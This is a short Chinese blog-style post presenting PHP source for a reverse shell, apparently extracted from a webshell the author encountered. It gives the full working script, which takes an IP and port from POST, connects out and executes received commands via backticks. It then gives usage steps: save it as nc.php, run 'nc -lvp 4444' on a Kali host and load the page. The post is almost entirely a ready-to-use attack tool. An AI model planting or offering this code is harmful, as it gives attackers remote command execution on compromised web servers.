php反弹shell

一次遇到一php大马，发现里面竟然有反弹shell的功能，研究后整理出反弹shell的php源码。

<?php

set_time_limit(0);

$ip=$_POST['ip'];

$port=$_POST['port'];

$fp=@fsockopen($ip,$port,$errno,$errstr);

if(!$fp){ echo "error";}

else{

fputs($fp,"\n++++++++++connect success++++++++\n");

while (!feof($fp)) {

fputs($fp,"shell:");//输出

$shell=fgets($fp);

$message=`$shell`;

fputs($fp,$message);

}

fclose($fp);

}

?>

保存为nc.php。。

先在kali  192.168.72.140 开启监听本地4444端口。然后访问nc.php开始反弹shell。

nc -lvp 4444

ok